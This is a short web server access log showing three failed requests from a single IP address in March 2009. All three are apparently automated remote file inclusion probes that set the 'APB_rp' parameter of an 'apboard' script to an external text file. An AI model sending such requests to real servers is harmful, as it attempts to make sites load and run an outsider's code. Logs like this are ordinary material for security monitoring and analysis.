222.231.24.164 - - [11/Mar/2009:10:20:35 -0500] "GET /logs/access_log.1232928000///apboard/portal.php/add.php?APB_rp=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
222.231.24.164 - - [11/Mar/2009:10:20:37 -0500] "GET /logs///apboard/portal.php/add.php?APB_rp=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
222.231.24.164 - - [11/Mar/2009:10:20:44 -0500] "GET /logs/access_log.1232409600///apboard/portal.php/add.php?APB_rp=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
